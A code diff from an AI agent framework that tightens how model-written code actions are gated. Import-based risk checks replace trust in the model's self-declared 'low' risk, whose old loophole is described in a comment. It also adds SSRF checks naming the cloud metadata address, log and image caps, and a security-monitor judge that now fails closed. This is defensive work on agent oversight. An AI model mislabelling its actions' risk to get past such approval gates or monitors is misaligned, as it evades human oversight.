+          const text = truncateToolResult(
+            JSON.stringify(observation),
+            MAX_TOOL_RESULT_CHARS,
+            ACTION_TRUNCATION_ADVICE
+          );
+          span?.setAttributes({
+            "agent.action.duration_ms": Date.now() - startedAt,
+            "agent.action.tool_calls": observation.toolCalls,
+            "agent.action.ok": outcome.success,
+            "agent.action.truncated":
+              payload.truncated || text.length > MAX_TOOL_RESULT_CHARS,
+            ...(observation.error !== undefined
+              ? { "agent.action.error": observation.error.slice(0, 500) }
+              : {})
+          });
+          return images.length > 0
+            ? [{ type: "text", text }, ...images]
+            : text;
         }
-      });
-
-      const observation: ActionObservation = {
-        ok: outcome.success,
-        toolCalls: bridge.callCount()
-      };
-      if (outcome.success) {
-        if (outcome.result !== undefined) observation.result = outcome.result;
-      } else {
-        Object.assign(
-          observation,
-          annotateFailure(outcome.error, outcome.stack, this.prelude, code)
-        );
-      }
-      if (outcome.logs && outcome.logs.length > 0) {
-        observation.logs = outcome.logs;
-      }
-
-      // A validated finish() completes the step even when the action crashed
-      // after recording it — the model cannot retract a validated result.
-      if (finishedResult) {
-        observation.finished = true;
-        this.storeCompletionResult(finishedResult.value);
-        ui.push(this.taskUpdate(TaskUpdateEvent.StepCompleted));
-        ui.push(this.stepResult(finishedResult.value));
-        abort.abort();
-      } else if (
-        this.resultSchema !== null &&
-        outcome.success &&
-        observation.result !== undefined &&
-        observation.result !== null
-      ) {
-        // The action produced a value and ended the turn without finishing.
-        // Say so in the observation: an absent `finished` reads as success.
-        observation.finished = false;
-        observation.note =
-          validateAgainstSchema(observation.result, this.resultSchema).length ===
-          0
-            ? RETURN_MATCHES_SCHEMA_NOTE
-            : RETURN_IS_NOT_FINISH_NOTE;
-      }
-
-      const text = truncateToolResult(JSON.stringify(observation));
-      // Pixels a tool returned during the action ride beside the observation
-      // as a provider image message; the observation itself stays light.
-      const images = bridge.drainImages();
-      return images.length > 0 ? [{ type: "text", text }, ...images] : text;
+      );
     };
 
     const providerTools = [

--- a/packages/agents/src/codeact/execute-code-contract.ts
+++ b/packages/agents/src/codeact/execute-code-contract.ts
@@ -26,7 +26,22 @@
  * should not have to read JavaScript to know what they are agreeing to.
  */
 
+import {
+  parseCodeBody,
+  staticImportBindings,
+  type CodeBodyStatement
+} from "@nodetool-ai/node-sdk";
+import {
+  sandboxCapabilityModuleName,
+  SANDBOX_CAPABILITY_PACK
+} from "@nodetool-ai/protocol";
+
+import { capabilityModuleSpecTable } from "../capabilities/registry.js";
 import type { CapabilityGate } from "../capabilities/types.js";
+import {
+  permissionCategoryFor,
+  TOOL_PERMISSION_CATEGORIES
+} from "../tools/tool-permissions.js";
 import { isString } from "../utils/type-guards.js";
 
 export const EXECUTE_CODE_TOOL_NAME = "execute_code";
@@ -109,6 +124,69 @@ export function declaredActionRisk(
   return args?.["risk"] === "low" ? "low" : "high";
 }
 
+/**
+ * The risk floor the program's own imports set, read off the code rather than
+ * off what the model declared about it.
+ *
+ * `risk: "low"` used to be admitted unread, so a program that imported
+ * `delete_workflow` and called itself low ran unattended in auto mode. Every
+ * capability import is a static binding the mount already parses, and each
+ * imported name has a permission category: a name in the `write`, `execute`
+ * or `external` class makes the action high risk whatever the call declared.
+ * A default or namespace import of a capability module reaches everything the
+ * module exports, so it takes the module's highest category.
+ *
+ * Only names the permission table knows raise the floor. A session tool
+ * (`.../session`, a client `ui_*` schema) has no entry — `permissionCategoryFor`
+ * answers its fail-closed `external` for any unknown string — and it is gated
+ * per call inside the action, so its import keeps the declared risk. The
+ * object model (`nodetool.*`) reaches tools without an import and is not
+ * read here; the per-call ladder is what governs it.
+ */
+export function importedActionRisk(code: string): ActionRisk {
+  const parsed = parseCodeBody(code);
+  if ("error" in parsed) return "low";
+  return actionable(parsed.statements) ? "high" : "low";
+}
+
+function actionable(statements: readonly CodeBodyStatement[]): boolean {
+  for (const binding of staticImportBindings(statements)) {
+    if (!binding.specifier.startsWith(SANDBOX_CAPABILITY_PACK)) continue;
+    for (const name of binding.named) {
+      if (
+        Object.hasOwn(TOOL_PERMISSION_CATEGORIES, name) &&
+        permissionCategoryFor(name) !== "read"
+      ) {
+        return true;
+      }
+    }
+  }
+  for (const statement of statements) {
+    if (statement.type !== "ImportDeclaration") continue;
+    if (!isString(statement.source.value)) continue;
+    if (!statement.source.value.startsWith(SANDBOX_CAPABILITY_PACK)) continue;
+    const whole = statement.specifiers.some(
+      (specifier) => specifier.type !== "ImportSpecifier"
+    );
+    if (!whole) continue;
+    const module = sandboxCapabilityModuleName(statement.source.value);
+    if (module === undefined) continue;
+    if (capabilityModuleSpecTable(module).some((spec) => spec.category !== "read")) {
+      return true;
+    }
+  }
+  return false;
+}
+
+/** The risk an action runs at: the declared value, raised by its imports. */
+export function effectiveActionRisk(
+  args: Record<string, unknown> | null | undefined
+): ActionRisk {
+  if (declaredActionRisk(args) === "high") return "high";
+  const code = args?.["code"];
+  return isString(code) ? importedActionRisk(code) : "high";
+}
+
 /** Refusal carries the observation text the model sees instead of a result. */
 export type ActionAdmission =
   | { allowed: true }
@@ -130,7 +208,7 @@ export async function admitCodeAction(
   args: Record<string, unknown>
 ): Promise<ActionAdmission> {
   if (!gate || gate.mode !== "auto") return ALLOWED;
-  if (declaredActionRisk(args) === "low") return ALLOWED;
+  if (effectiveActionRisk(args) === "low") return ALLOWED;
   if (gate.sessionAllow.has(EXECUTE_CODE_TOOL_NAME)) return ALLOWED;
 
   const answer = await gate.requestApproval({
@@ -138,7 +216,7 @@ export async function admitCodeAction(
     category: "execute",
     args: {
       title: isString(args["title"]) ? args["title"] : "",
-      risk: declaredActionRisk(args),
+      risk: effectiveActionRisk(args),
       code: isString(args["code"]) ? args["code"] : ""
     },
     message: executeCodeMessage(args),

--- a/packages/agents/src/codeact/execute-code-contract.ts
+++ b/packages/agents/src/codeact/execute-code-contract.ts
@@ -128,12 +128,16 @@ export function declaredActionRisk(
  * off what the model declared about it.
  *
  * `risk: "low"` used to be admitted unread, so a program that imported
- * `delete_workflow` and called itself low ran unattended in auto mode. Every
+ * `run_workflow` and called itself low ran unattended in auto mode. Every
  * capability import is a static binding the mount already parses, and each
- * imported name has a permission category: a name in the `write`, `execute`
- * or `external` class makes the action high risk whatever the call declared.
- * A default or namespace import of a capability module reaches everything the
- * module exports, so it takes the module's highest category.
+ * imported name has a permission category: a name in the `execute` or
+ * `external` class — the calls that spend money or leave this account, which
+ * the `risk` option itself defines as high — makes the action high risk
+ * whatever the call declared. A default or namespace import of a capability
+ * module reaches everything the module exports, so it takes the module's
+ * highest category. The `write` class stays at the declared risk: a file the
+ * user asked for is the option's own example of low, and only the model can
+ * tell that write from a delete, so the declaration carries it.
  *
  * Only names the permission table knows raise the floor. A session tool
  * (`.../session`, a client `ui_*` schema) has no entry — `permissionCategoryFor`
@@ -142,6 +146,9 @@ export function declaredActionRisk(
  * object model (`nodetool.*`) reaches tools without an import and is not
  * read here; the per-call ladder is what governs it.
  */
+/** The permission classes whose import alone makes an action high risk. */
+const FLOOR_CATEGORIES: ReadonlySet<string> = new Set(["execute", "external"]);
+
 export async function importedActionRisk(code: string): Promise<ActionRisk> {
   const parsed = parseCodeBody(code);
   if ("error" in parsed) return "low";
@@ -159,8 +166,8 @@ async function moduleIsActionable(module: string): Promise<boolean> {
   const { capabilityModuleSpecTable } = await import(
     "../capabilities/registry.js"
   );
-  return capabilityModuleSpecTable(module).some(
-    (spec) => spec.category !== "read"
+  return capabilityModuleSpecTable(module).some((spec) =>
+    FLOOR_CATEGORIES.has(spec.category)
   );
 }
 
@@ -172,7 +179,7 @@ async function actionable(
     for (const name of binding.named) {
       if (
         Object.hasOwn(TOOL_PERMISSION_CATEGORIES, name) &&
-        permissionCategoryFor(name) !== "read"
+        FLOOR_CATEGORIES.has(permissionCategoryFor(name))
       ) {
         return true;
       }

--- a/packages/agents/src/codeact/execute-code-contract.ts
+++ b/packages/agents/src/codeact/execute-code-contract.ts
@@ -36,7 +36,6 @@ import {
   SANDBOX_CAPABILITY_PACK
 } from "@nodetool-ai/protocol";
 
-import { capabilityModuleSpecTable } from "../capabilities/registry.js";
 import type { CapabilityGate } from "../capabilities/types.js";
 import {
   permissionCategoryFor,
@@ -143,13 +142,31 @@ export function declaredActionRisk(
  * object model (`nodetool.*`) reaches tools without an import and is not
  * read here; the per-call ladder is what governs it.
  */
-export function importedActionRisk(code: string): ActionRisk {
+export async function importedActionRisk(code: string): Promise<ActionRisk> {
   const parsed = parseCodeBody(code);
   if ("error" in parsed) return "low";
-  return actionable(parsed.statements) ? "high" : "low";
+  return (await actionable(parsed.statements)) ? "high" : "low";
 }
 
-function actionable(statements: readonly CodeBodyStatement[]): boolean {
+/**
+ * Whether a capability module carries anything past read class. The registry
+ * is reached lazily: importing it here statically would make this contract
+ * module load every capability spec, and a host that mocks the registry (the
+ * CLI's permission-gate suite) only ever needs the tool name and the
+ * declared-risk path.
+ */
+async function moduleIsActionable(module: string): Promise<boolean> {
+  const { capabilityModuleSpecTable } = await import(
+    "../capabilities/registry.js"
+  );
+  return capabilityModuleSpecTable(module).some(
+    (spec) => spec.category !== "read"
+  );
+}
+
+async function actionable(
+  statements: readonly CodeBodyStatement[]
+): Promise<boolean> {
   for (const binding of staticImportBindings(statements)) {
     if (!binding.specifier.startsWith(SANDBOX_CAPABILITY_PACK)) continue;
     for (const name of binding.named) {
@@ -171,7 +188,7 @@ function actionable(statements: readonly CodeBodyStatement[]): boolean {
     if (!whole) continue;
     const module = sandboxCapabilityModuleName(statement.source.value);
     if (module === undefined) continue;
-    if (capabilityModuleSpecTable(module).some((spec) => spec.category !== "read")) {
+    if (await moduleIsActionable(module)) {
       return true;
     }
   }
@@ -179,9 +196,9 @@ function actionable(statements: readonly CodeBodyStatement[]): boolean {
 }
 
 /** The risk an action runs at: the declared value, raised by its imports. */
-export function effectiveActionRisk(
+export async function effectiveActionRisk(
   args: Record<string, unknown> | null | undefined
-): ActionRisk {
+): Promise<ActionRisk> {
   if (declaredActionRisk(args) === "high") return "high";
   const code = args?.["code"];
   return isString(code) ? importedActionRisk(code) : "high";
@@ -208,7 +225,8 @@ export async function admitCodeAction(
   args: Record<string, unknown>
 ): Promise<ActionAdmission> {
   if (!gate || gate.mode !== "auto") return ALLOWED;
-  if (effectiveActionRisk(args) === "low") return ALLOWED;
+  const risk = await effectiveActionRisk(args);
+  if (risk === "low") return ALLOWED;
   if (gate.sessionAllow.has(EXECUTE_CODE_TOOL_NAME)) return ALLOWED;
 
   const answer = await gate.requestApproval({
@@ -216,7 +234,7 @@ export async function admitCodeAction(
     category: "execute",
     args: {
       title: isString(args["title"]) ? args["title"] : "",
-      risk: effectiveActionRisk(args),
+      risk,
       code: isString(args["code"]) ? args["code"] : ""
     },
     message: executeCodeMessage(args),

--- a/packages/agents/src/codeact/prompt.ts
+++ b/packages/agents/src/codeact/prompt.ts
@@ -124,6 +124,9 @@ const actionContractStep = (
 - For file work use the sandbox's own \`workspace.*\` API (\`read\`, \`write\`,
   \`list\`, \`readBytes\`, \`writeBytes\`, \`stat\`, \`copy\`, \`move\`, \`mkdir\`,
   \`remove\`) — it is in-process, so a read costs nothing a tool call would.
+- Network and secrets are available only through imported capabilities
+  (\`nodetool.web.fetch\` / \`browse\`, tools that take a secret by name): a
+  step action runs with a zero-request fetch limit and no secret scope.
 - Do not ask the user questions. Choose a reasonable assumption and proceed.`;
 
 function actionContractChat(
@@ -184,6 +187,16 @@ const CHAT_UNAVAILABLE_BRIDGES = ["fetch", "getSecret"] as const;
  * The bridges the chat variant hides: the two above plus every bridge whose
  * members all need a `ProcessingContext`, which a chat action runs without.
  */
+/**
+ * The bridges a step action cannot use: a step runs with a zero-request
+ * fetch limit and an empty secret scope (`STEP_ACTION_SANDBOX_LIMITS` in
+ * `codeact-executor.ts`), so network and secrets go through imported
+ * capabilities there too. Everything else stays: a step has a context.
+ */
+export function stepUnavailableBridges(): string[] {
+  return [...CHAT_UNAVAILABLE_BRIDGES].sort();
+}
+
 export function chatUnavailableBridges(
   manifest: SandboxManifest = getSandboxManifest()
 ): string[] {
@@ -230,11 +243,15 @@ function renderSandboxSummary(
   variant: "step" | "chat",
   nodetoolApiLoaded: boolean
 ): string {
-  const unavailableInChat = new Set(chatUnavailableBridges(manifest));
+  const hidden = new Set(
+    variant === "chat"
+      ? chatUnavailableBridges(manifest)
+      : stepUnavailableBridges()
+  );
   const lines: string[] = [];
   for (const bridge of Object.values(manifest.bridges)) {
     if (bridge.internal || bridge.members.length === 0) continue;
-    if (variant === "chat" && unavailableInChat.has(bridge.name)) continue;
+    if (hidden.has(bridge.name)) continue;
     for (const member of bridge.members) {
       lines.push(`- ${member.signature}`);
     }
@@ -252,10 +269,7 @@ function renderSandboxSummary(
     variant === "chat"
       ? "imported capabilities"
       : "imported capabilities, `finish`";
-  const notes = relevantNotes(
-    manifest,
-    variant === "chat" ? unavailableInChat : new Set<string>()
-  );
+  const notes = relevantNotes(manifest, hidden);
   return [
     `# Sandbox API (besides ${besides})`,
     // Before the signatures: the notes point at "the bridges below".

--- a/packages/agents/src/codeact/tool-api.ts
+++ b/packages/agents/src/codeact/tool-api.ts
@@ -20,6 +20,7 @@ import type {
 import { sandboxCapabilitySpecifier } from "@nodetool-ai/protocol";
 
 import { capabilityModuleOf } from "../capabilities/registry.js";
+import { MAX_ACTION_IMAGES } from "../constants.js";
 import { Tool } from "../tools/base-tool.js";
 import {
   extractInjectableImages,
@@ -80,10 +81,11 @@ export interface ToolBridge {
   resetActionBudget: () => void;
   /**
    * Pixels a tool returned during this action, removed from the observation
-   * and waiting to ride the tool result as a provider image message. Draining
-   * clears them.
+   * and waiting to ride the tool result as a provider image message. At most
+   * {@link MAX_ACTION_IMAGES} are kept; `dropped` counts the rest. Draining
+   * clears both.
    */
-  drainImages: () => MessageImageContent[];
+  drainImages: () => { images: MessageImageContent[]; dropped: number };
 }
 
 /** Force a value through JSON so it marshals cleanly across the WASM boundary. */
@@ -144,6 +146,7 @@ export function buildToolBridge(options: ToolBridgeOptions): ToolBridge {
   // Lifetime count across actions — the id a tool sees must stay unique.
   let totalCalls = 0;
   let pendingImages: MessageImageContent[] = [];
+  let droppedImages = 0;
 
   const callTool = async (
     name: unknown,
@@ -195,7 +198,10 @@ export function buildToolBridge(options: ToolBridgeOptions): ToolBridge {
       // provider image message alongside the observation.
       const injected = extractInjectableImages(result);
       if (injected) {
-        pendingImages.push(...injected.images);
+        for (const image of injected.images) {
+          if (pendingImages.length < MAX_ACTION_IMAGES) pendingImages.push(image);
+          else droppedImages++;
+        }
         result = stripImagePayload(result);
       }
       const errorPayload = extractErrorPayload(result);
@@ -236,8 +242,10 @@ export function buildToolBridge(options: ToolBridgeOptions): ToolBridge {
     },
     drainImages: () => {
       const images = pendingImages;
+      const dropped = droppedImages;
       pendingImages = [];
-      return images;
+      droppedImages = 0;
+      return { images, dropped };
     }
   };
 }

--- a/packages/agents/src/constants.ts
+++ b/packages/agents/src/constants.ts
@@ -6,6 +6,32 @@
 export const MAX_TOOL_RESULT_CHARS = 25_000;
 
 /**
+ * Characters of a code action's `result` kept in the observation. Bounded on
+ * its own so a large return value never pushes `finished`/`note`/`error` out
+ * of the envelope the way one cap over the whole JSON did.
+ */
+export const MAX_ACTION_RESULT_CHARS = 16_000;
+
+/** Characters of a code action's console `logs` kept in the observation. */
+export const MAX_ACTION_LOGS_CHARS = 6_000;
+
+/**
+ * Images one code action may hand the model beside its observation. A
+ * tool that returns pixels is bridged up to 50 times per action, so without
+ * a cap one action could forward 50 screenshots.
+ */
+export const MAX_ACTION_IMAGES = 8;
+
+/**
+ * What the cut notice tells a code action, instead of the grep/read advice
+ * `truncateToolResult` gives by default: the value came from the model's own
+ * program, so the fix is to return less of it.
+ */
+export const ACTION_TRUNCATION_ADVICE =
+  "Return a compact summary (counts, ids, the few fields you need) and put " +
+  "large payloads in memory or a workspace file.";
+
+/**
  * Action rounds one step gets when the caller names none. Both DAG executors
  * (`task-executor.ts`, `parallel-task-executor.ts`) fall back to it.
  */
@@ -26,7 +52,8 @@ export const DEFAULT_MAX_CONCURRENT_AGENTS = 8;
  *
  * Returns `text` unchanged when it already fits. Otherwise keeps the first
  * `maxChars` characters and appends a notice telling the model the output was
- * cut and how to fetch a smaller slice.
+ * cut and how to fetch a smaller slice. `advice` replaces the default
+ * retrieval advice when the caller's surface has a different fix.
  *
  * The cut is pulled back by one if it would land between the two halves of a
  * UTF-16 surrogate pair, so the kept prefix never ends in a lone surrogate
@@ -34,7 +61,8 @@ export const DEFAULT_MAX_CONCURRENT_AGENTS = 8;
  */
 export function truncateToolResult(
   text: string,
-  maxChars: number = MAX_TOOL_RESULT_CHARS
+  maxChars: number = MAX_TOOL_RESULT_CHARS,
+  advice: string = "Narrow the query, request a specific range, or use pagination/filters to retrieve a smaller result."
 ): string {
   if (text.length <= maxChars) return text;
   // Avoid splitting a surrogate pair: if the char just before the cut is a
@@ -46,7 +74,7 @@ export function truncateToolResult(
   return (
     text.slice(0, cut) +
     `\n\n... [tool result truncated: kept first ${cut} of ${text.length} characters, ${omitted} omitted. ` +
-    `Narrow the query, request a specific range, or use pagination/filters to retrieve a smaller result.]`
+    `${advice}]`
   );
 }
 

--- a/packages/agents/src/js-sandbox.ts
+++ b/packages/agents/src/js-sandbox.ts
@@ -112,7 +112,11 @@ import {
   type WasmWorkerPool
 } from "./wasm-sandbox/host.js";
 import { runInWorker } from "./js-sandbox-worker/host.js";
-import { assertFetchUrlAllowed } from "./network-guard.js";
+import {
+  assertFetchUrlAllowed,
+  assertResolvedHostAllowed,
+  type HostResolver
+} from "./network-guard.js";
 import {
   GUEST_GLOBALS_JSON_BINDING,
   GUEST_GLOBALS_SIDECAR_BINDING,
@@ -174,8 +178,20 @@ export { MAX_RANDOM_BYTES };
 export const MAX_PROGRESS_CALLS = 1000;
 /** Console lines forwarded to {@link RunSandboxOptions.onLog} per run. */
 export const MAX_CONSOLE_LOGS = 1000;
-/** Longest console line forwarded to the host. The collected `logs` array is not truncated. */
+/** Longest console line forwarded to the host. A collected line is not truncated on its own. */
 export const MAX_CONSOLE_LOG_CHARS = 4000;
+/**
+ * Console lines the run's `logs` array collects. Forwarding was capped and
+ * collection was not: guest strings are not charged to the QuickJS heap, so a
+ * `console.log` in a hot loop grew host memory for the length of the action.
+ */
+export const MAX_COLLECTED_CONSOLE_LOGS = 5000;
+/** Characters the run's `logs` array collects in total, across every line. */
+export const MAX_COLLECTED_CONSOLE_CHARS = 512 * 1024;
+/** The single line that closes a collected log the caps cut. */
+export const CONSOLE_LOGS_CUT_NOTICE =
+  `[console output cut: at most ${MAX_COLLECTED_CONSOLE_LOGS} lines / ` +
+  `${MAX_COLLECTED_CONSOLE_CHARS} characters are kept per run]`;
 /**
  * Emitted values a run may deliver. Unlike progress reports, emits are never
  * dropped or rate-limited — every value reaches the host in call order — so the
@@ -216,8 +232,10 @@ export type SandboxLogLevel = "log" | "info" | "warn" | "error";
  * Host sink for guest `console.*` calls. Synchronous and fire-and-forget:
  * a failing sink does not take the guest down. At most
  * {@link MAX_CONSOLE_LOGS} lines are forwarded, each truncated to
- * {@link MAX_CONSOLE_LOG_CHARS}. The run's `logs` array still collects every
- * line. Without a callback the guest console still writes that array.
+ * {@link MAX_CONSOLE_LOG_CHARS}. The run's `logs` array collects lines up to
+ * {@link MAX_COLLECTED_CONSOLE_LOGS} / {@link MAX_COLLECTED_CONSOLE_CHARS},
+ * then one {@link CONSOLE_LOGS_CUT_NOTICE}. Without a callback the guest
+ * console still writes that array.
  */
 export type SandboxLogCallback = (
   level: SandboxLogLevel,
@@ -969,12 +987,32 @@ export function buildSandbox(
     type: "image" | "audio" | "video",
     bytes: Uint8Array,
     options?: Record<string, unknown>
-  ) => Promise<unknown>
+  ) => Promise<unknown>,
+  resolveHost?: HostResolver
 ): SandboxResult {
   const logs: string[] = [];
   const resolvedLimits = resolveSandboxLimits(limits);
   let fetchCount = 0;
   let forwardedLogs = 0;
+  let collectedChars = 0;
+  let collectionCut = false;
+
+  // Bounded by count and by bytes; the cut is noted once, then nothing more
+  // is kept. A line that does not fit whole keeps the head that does.
+  const collectLog = (entry: string): void => {
+    if (collectionCut) return;
+    const remaining = MAX_COLLECTED_CONSOLE_CHARS - collectedChars;
+    if (logs.length < MAX_COLLECTED_CONSOLE_LOGS && entry.length <= remaining) {
+      logs.push(entry);
+      collectedChars += entry.length;
+      return;
+    }
+    if (logs.length < MAX_COLLECTED_CONSOLE_LOGS && remaining > 0) {
+      logs.push(entry.slice(0, remaining));
+    }
+    collectionCut = true;
+    logs.push(CONSOLE_LOGS_CUT_NOTICE);
+  };
 
   const pushConsole = (
     level: SandboxLogLevel,
@@ -982,7 +1020,7 @@ export function buildSandbox(
     args: unknown[]
   ): void => {
     const line = args.map(formatArg).join(" ");
-    logs.push(prefix + line);
+    collectLog(prefix + line);
     if (!onLog || signal?.aborted) return;
     if (forwardedLogs >= MAX_CONSOLE_LOGS) return;
     forwardedLogs++;
@@ -1012,6 +1050,30 @@ export function buildSandbox(
     }
   };
 
+  // The literal check above answers a hostname with "not an IP"; this one
+  // resolves it, so `metadata.example.com` → 169.254.169.254 is refused
+  // before a socket opens, on the first request and on every redirect hop.
+  // Node only: off Node the default resolver has no `dns` and answers
+  // nothing, and the browser's own network layer is the boundary there. One
+  // lookup per hostname per run — the guard is a layer, not the boundary (the
+  // socket resolves again), so re-resolving every call buys no rebinding
+  // protection and would cost a round trip per parallel fetch.
+  const onNodeHost = isString(globalThis.process?.versions?.node);
+  const resolvedHosts = new Map<string, Promise<void>>();
+  const assertHostResolvesAllowed = async (target: string): Promise<void> => {
+    if (!onNodeHost || resolvedLimits.allowPrivateNetwork) return;
+    const host = new URL(target).hostname;
+    let pending = resolvedHosts.get(host);
+    if (pending === undefined) {
+      pending =
+        resolveHost === undefined
+          ? assertResolvedHostAllowed(target, "fetch")
+          : assertResolvedHostAllowed(target, "fetch", resolveHost);
+      resolvedHosts.set(host, pending);
+    }
+    await pending;
+  };
+
   const sandboxedFetch = async (
     url: string,
     options?: Record<string, unknown>
@@ -1027,10 +1089,12 @@ export function buildSandbox(
     }
     // SSRF guard: untrusted guest code must not reach loopback, link-local
     // (incl. cloud metadata 169.254.169.254), or private ranges, nor non-http
-    // schemes. Blocks the direct-literal attacks; DNS-rebinding is out of scope.
+    // schemes. This is the literal check; the resolved-address check follows.
+    // DNS rebinding between the check and the socket is out of scope.
     // The host can waive the address check for a node that replaces a trusted
     // `lib.http` node; the scheme check is never waived.
     assertFetchUrlAllowed(url, resolvedLimits.allowPrivateNetwork);
+    await assertHostResolvesAllowed(url);
 
     const controller = new AbortController();
     const timer = setTimeout(
@@ -1147,6 +1211,7 @@ export function buildSandbox(
           const nextUrl = new URL(location, currentUrl).toString();
           // Re-run the guard on the resolved target BEFORE the next request.
           assertFetchUrlAllowed(nextUrl, resolvedLimits.allowPrivateNetwork);
+          await assertHostResolvesAllowed(nextUrl);
           // Strip credential headers on a cross-origin hop (origin includes
           // scheme, host and port); keep them on same-origin redirects.
           if (new URL(nextUrl).origin !== new URL(currentUrl).origin) {
@@ -2667,6 +2732,12 @@ export interface RunSandboxOptions {
     bytes: Uint8Array,
     options?: Record<string, unknown>
   ) => Promise<unknown>;
+  /**
+   * How the fetch bridge turns a hostname into addresses for the resolved
+   * SSRF check. Defaults to `node:dns`; a test passes a fixed table so no
+   * lookup leaves the process.
+   */
+  resolveHost?: HostResolver;
 }
 
 export interface RunSandboxResult {
@@ -2815,7 +2886,8 @@ export async function runInSandbox(
     capabilities,
     wasmPool,
     resolveMediaRef,
-    promoteMedia
+    promoteMedia,
+    resolveHost
   } = options;
   const resolvedLimits = resolveSandboxLimits(limits);
   // A streaming run needs a clock whether or not the caller brought one: the
@@ -2874,7 +2946,8 @@ export async function runInSandbox(
     onEmit,
     streams,
     resolveMediaRef,
-    promoteMedia
+    promoteMedia,
+    resolveHost
   );
 
   // User-supplied globals (dynamic inputs from CodeNode etc.) layer on top of

--- a/packages/agents/src/parallel-task-executor.ts
+++ b/packages/agents/src/parallel-task-executor.ts
@@ -11,8 +11,7 @@
 import type {
   BaseProvider,
   ProcessingContext,
-  RunBudget,
-  Semaphore
+  RunBudget
 } from "@nodetool-ai/runtime";
 import {
   budgetFromContext,
@@ -27,11 +26,7 @@ import type {
 } from "@nodetool-ai/protocol";
 import { TaskUpdateEvent } from "@nodetool-ai/protocol";
 import { TaskExecutor } from "./task-executor.js";
-import {
-  holdsRunSlot,
-  markRunSlotHeld,
-  settleResultValue
-} from "./subagent.js";
+import { settleResultValue } from "./subagent.js";
 import {
   ABORTED,
   UNSATISFIABLE_DEPENDENCY,
@@ -69,9 +64,9 @@ export interface ParallelTaskExecutorOptions {
   /** Cap on output tokens per step turn. Forwarded to each TaskExecutor. */
   maxTokens?: number;
   /**
-   * The run's budget, forwarded to every task (and through it to every step),
-   * and used as the concurrency bound the task fan-out shares with them.
-   * Omitted, the budget on {@link context} is used.
+   * The run's budget, forwarded to every task and through it to every step,
+   * whose provider conversations draw on its permit pool. Omitted, the budget
+   * on {@link context} is used.
    */
   budget?: RunBudget;
   /** External cancellation, forwarded to every task and step executor. */
@@ -92,11 +87,6 @@ export class ParallelTaskExecutor {
   private readonly maxConcurrentAgents: number;
   private readonly maxTokens?: number;
   private readonly budget?: RunBudget;
-  /**
-   * The run's permit pool, when this executor is the layer drawing from it —
-   * see {@link TaskExecutor}'s own field for why only one layer per branch may.
-   */
-  private mergeSemaphore?: Semaphore;
   private readonly signal?: AbortSignal;
   private readonly sandboxPackages: readonly string[];
   /**
@@ -134,30 +124,6 @@ export class ParallelTaskExecutor {
    * Independent tasks run concurrently as separate sub-agents.
    */
   async *execute(): AsyncGenerator<ProcessingMessage> {
-    const leaveRunSlot = this.enterRunSlot();
-    try {
-      yield* this.runPlan();
-    } finally {
-      leaveRunSlot();
-    }
-  }
-
-  /**
-   * Claim this branch's run slot for the task fan-out, and hand back the undo.
-   * The `TaskExecutor`s built below then see the branch holding it and bound
-   * their own step fan-outs numerically, instead of queueing for permits this
-   * executor is already holding on their behalf — which would deadlock.
-   */
-  private enterRunSlot(): () => void {
-    if (!this.budget || holdsRunSlot(this.context)) {
-      this.mergeSemaphore = undefined;
-      return () => {};
-    }
-    this.mergeSemaphore = this.budget.concurrency;
-    return markRunSlotHeld(this.context);
-  }
-
-  private async *runPlan(): AsyncGenerator<ProcessingMessage> {
     // Seed inputs into shared agent memory so every task and step sees them.
     for (const [key, value] of Object.entries(this.inputs)) {
       this.context.memory.set({
@@ -185,10 +151,11 @@ export class ParallelTaskExecutor {
     const nodes = this.taskNodes();
     yield* scheduleDag<TaskNode, ProcessingMessage>({
       nodes,
-      // The branch's pool when this executor is the layer drawing from it,
-      // else a pool of its own so an unbudgeted plan is still bounded.
-      concurrency:
-        this.mergeSemaphore ?? createSemaphore(this.maxConcurrentAgents),
+      // A task opens no provider conversation of its own — its steps do, and
+      // they draw on the run's pool inside `TaskExecutor`. A task holding a
+      // run permit for its whole length while its steps queued for more is
+      // what deadlocked nested layers, so this bound is numeric only.
+      concurrency: createSemaphore(this.maxConcurrentAgents),
       maxConcurrent: this.maxConcurrentAgents,
       signal: this.signal,
       run: (node) => this.runTask(node.task),
@@ -197,7 +164,9 @@ export class ParallelTaskExecutor {
       onBlocked: (node, by) =>
         this.blockTaskEvents(
           node.task,
-          `Task blocked: dependency ${by.id} failed`
+          this.signal?.aborted
+            ? "Task aborted"
+            : `Task blocked: dependency ${by.id} failed`
         )
     });
 
@@ -439,14 +408,22 @@ export class ParallelTaskExecutor {
     if (incomplete.length > 0) {
       return `${incomplete.length} of ${task.steps.length} step(s) did not complete (run budget exhausted or unsatisfiable dependency)`;
     }
+    // A schema'd step asked for its object shape, so a string `error` field in
+    // it is data the plan requested, not the failure payload a dying step
+    // writes — the same distinction `runSubAgent` draws.
     for (const step of task.steps) {
       const value = this.context.memory.getValue(memoryKeys.step(step.id));
-      const settled = settleResultValue(value);
+      const settled = settleResultValue(value, {
+        hasOutputSchema: Boolean(step.outputSchema)
+      });
       if (settled && !settled.ok) {
         return `step ${step.id}: ${settled.error}`;
       }
     }
-    const settledTask = settleResultValue(taskResult);
+    const finishStep = task.steps[task.steps.length - 1];
+    const settledTask = settleResultValue(taskResult, {
+      hasOutputSchema: Boolean(finishStep?.outputSchema)
+    });
     if (settledTask && !settledTask.ok) {
       return settledTask.error;
     }

--- a/packages/agents/src/security-monitor.ts
+++ b/packages/agents/src/security-monitor.ts
@@ -12,12 +12,12 @@
  * The clearing logic lives entirely in the judge prompt; this class trusts the
  * returned `block` flag.
  *
- * Fail-OPEN: when the judge errors or returns unparseable output, the verdict
- * defaults to ALLOW (block:false) and a warning is logged. This honors the
- * prompt's "actions are allowed by default" stance and avoids bricking an
- * autonomous run when the judge model hiccups. This is a deliberate security
- * tradeoff; a fail-closed mode for HARD-suspect actions would be a future
- * follow-up, not a silent default.
+ * Fail-CLOSED for what the monitor exists to vet: when the judge errors or
+ * returns unparseable output, a `write`, `execute` or `external` action gets
+ * a SOFT block naming the failure, so a judge outage withholds the action
+ * rather than waving it through. A `read` action is allowed on the same
+ * failure — the gate never consults the monitor for one, so reaching here
+ * with `read` is a caller's choice, and a read has nothing to withhold.
  *
  * This module performs a single non-streaming provider call per review via
  * `provider.generateMessageTraced`. It is fully opt-in and constructed only
@@ -103,13 +103,32 @@ const TIERS: ReadonlySet<string> = new Set<SecurityTier>([
   "none"
 ]);
 
-/** The fail-open verdict used whenever the judge can't produce a usable answer. */
+/** The allow verdict a read-class action gets when the judge cannot answer. */
 const ALLOW_VERDICT: SecurityVerdict = {
   block: false,
   reason: "",
   severity: "low",
   tier: "none"
 };
+
+/**
